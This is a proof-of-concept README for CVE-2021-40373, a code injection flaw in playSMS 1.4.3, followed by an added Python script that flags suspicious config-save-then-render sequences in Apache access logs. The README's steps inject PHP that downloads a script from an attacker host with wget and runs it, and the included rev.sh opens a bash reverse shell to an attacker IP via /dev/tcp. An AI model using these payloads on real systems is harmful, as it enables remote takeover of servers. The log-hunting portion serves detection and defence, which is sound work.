CVE-2021-40373 PoC — playSMS Code Injection Vulnerability

Source
Associated Vulnerability
Title: playSMS Code Injection Vulnerability (CVE-2021-40373)
Description:playSMS before 1.4.5 allows Arbitrary Code Execution by entering PHP code at the #tabs-information-page of core_main_config, and then executing that code via the index.php?app=main&inc=core_welcome URI.
Description
CVE-2021-40373 - remote code execution
Readme
# CVE-playsms


There is a vulnerability in playSMS 1.4.3 that allows potential attackers to achieve remote code execution.


## how to reproduce RCE (shell):

https://playsms.org/
* `docker pull playsms/playsms:1.4.3`
* `docker run -d -p 80:80 playsms/playsms`
* log in using admin:admin
* http://127.0.0.1/index.php?app=main&inc=core_main_config&op=main_config#tabs-information-page
* host malicious bash file on attacker machine
* download the malicious file using wget on the machine
* enter `<?php system("/usr/bin/wget http://<attackerIP>/rev.sh"); echo "done" ?>`
* save the information (it will disappear from the input box but still work)
* http://127.0.0.1/index.php?app=main&inc=core_welcome
* reload the page http://127.0.0.1/index.php?app=main&inc=core_main_config&op=main_config#tabs-information-page
* chmod + execute the shell script - `<?php system("chmod +x rev.sh && ./rev.sh") ?>`
* save and visit http://127.0.0.1/index.php?app=main&inc=core_welcome to get code execution
* run local netcat handler to catch remote shell


## rev.sh
```bash
#!/usr/bin/bash
bash -c "bash -i >& /dev/tcp/<attackerIP>/1234 0>&1"
```
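
For defenders, the save-then-render pattern in the steps above (a POST to `inc=core_main_config` followed by a GET of `inc=core_welcome` from the same client) can be hunted in web server access logs. The following is an added example, not part of the original README or the playSMS project; the Apache combined log format, the 10-minute window, the function names and the sample lines are assumptions. Legitimate admin edits match too, so treat hits as triage leads.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format lines (not from a real system).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Sep/2021:10:01:02 +0000] "POST /index.php?app=main&inc=core_main_config&op=main_config HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Sep/2021:10:01:09 +0000] "GET /index.php?app=main&inc=core_welcome HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [12/Sep/2021:10:05:00 +0000] "GET /index.php?app=main&inc=core_welcome HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Sep/2021:11:00:00 +0000] "POST /index.php?app=main&inc=core_main_config&op=main_config HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Sep/2021:12:30:00 +0000] "GET /index.php?app=main&inc=core_welcome HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" \d{3}')


def inc_of(target):
    """Return the playSMS 'inc' parameter when app=main, else ''."""
    query = parse_qs(urlsplit(target).query)
    if query.get("app") != ["main"]:
        return ""
    return query.get("inc", [""])[0]


def find_config_then_welcome(log_text, window=timedelta(minutes=10)):
    """Flag clients that POST to core_main_config and then GET
    core_welcome within `window` (window size is an assumption)."""
    last_post = {}  # client IP -> time of most recent config POST
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, ts, method, target = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        inc = inc_of(target)
        if method == "POST" and inc == "core_main_config":
            last_post[ip] = when
        elif method == "GET" and inc == "core_welcome" and ip in last_post:
            posted = last_post.pop(ip)  # one hit per save/render pair
            if when - posted <= window:
                hits.append((ip, posted.isoformat(), when.isoformat()))
    return hits


if __name__ == "__main__":
    for hit in find_config_then_welcome(SAMPLE_LOG):
        print("review config change:", *hit)
```
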